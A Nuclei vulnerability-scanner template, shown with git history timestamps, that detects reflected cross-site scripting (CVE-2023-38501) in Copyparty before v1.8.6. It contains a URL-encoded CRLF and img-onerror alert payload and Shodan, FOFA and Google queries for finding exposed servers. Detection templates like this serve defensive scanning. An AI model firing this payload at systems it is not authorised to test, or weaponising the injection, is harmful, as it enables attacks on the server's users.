nuclei-templates/http/cves/2023/CVE-2023-38501.yaml

46 lines
1.9 KiB
YAML
Raw Normal View History

id: CVE-2023-38501
info:
2023-10-17 07:20:28 +00:00
name: CopyParty v1.8.6 - Cross Site Scripting
2023-10-17 08:16:05 +00:00
author: ctflearner,r3Y3r53
severity: medium
description: |
2023-10-17 07:20:28 +00:00
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
remediation: Fixed in v1.8.6
reference:
- https://www.exploit-db.com/exploits/51635
2023-10-17 07:20:28 +00:00
- https://github.com/9001/copyparty/releases/tag/v1.8.6
- https://nvd.nist.gov/vuln/detail/CVE-2023-38501
- http://packetstormsecurity.com/files/173821/Copyparty-1.8.6-Cross-Site-Scripting.html
- https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-38501
2023-10-17 08:16:05 +00:00
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.00198
epss-percentile: 0.57252
cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: copyparty_project
product: copyparty
shodan-query: title:"copyparty"
2024-05-31 19:23:20 +00:00
fofa-query: title="copyparty"
google-query: intitle:"copyparty"
2024-01-14 09:21:50 +00:00
tags: cve,cve2023,packetstorm,copyparty,xss,oss,copyparty_project
http:
- method: GET
path:
- "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"
matchers:
2023-10-17 07:20:28 +00:00
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "<img src=copyparty onerror=alert(document.domain)>","\">go to")'
condition: and
# digest: 490a00463044022058675a969abbe4a2b7fa295342715495195d739ef396e23a4a0d438308f7da2602204db3cacf7da7334c43cc5614d12dea9155acca0e5edf872eff3e6c17a315c7ce:922c64590222798bb761d5b6d8e72950